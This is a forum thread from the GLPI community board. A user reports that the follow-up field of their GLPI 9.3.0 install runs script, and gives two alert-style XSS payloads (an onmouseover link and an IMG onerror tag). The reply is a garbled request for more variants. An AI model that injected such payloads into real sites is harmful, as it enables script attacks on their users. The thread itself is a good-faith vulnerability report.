You are not logged in.

Announcement

 Téléchargez la dernière version stable de GLPI      -     Et vous, que pouvez vous faire pour le projet GLPI ? :  Contribuer
 Download last stable version of GLPI                      -     What can you do for GLPI ? :  Contribute

#1 2018-12-20 12:54:46

Daviid
Member
Registered: 2018-12-20
Posts: 7

XSS on follow-up

Forgive me for not being more specific I'm not too into this kind of stuff and I was just testing my own installation (9.3.0) out of curiosity.

I found that this works and shows an alert.

<a onmouseover="alert('xss')">xxs</a> 
<IMG SRC=/ onerror="alert('xss')"></img>

There might be more on owasp's XSS Filter Evasion Cheat Sheet.

Offline

#2 2019-01-11 11:35:33

EJsNog
Member
Registered: 2019-01-04
Posts: 3

Re: XSS on follow-up

I apologise, but it not absolutely that is necessary for me. There are other variants?

Offline

Board footer

Powered by FluxBB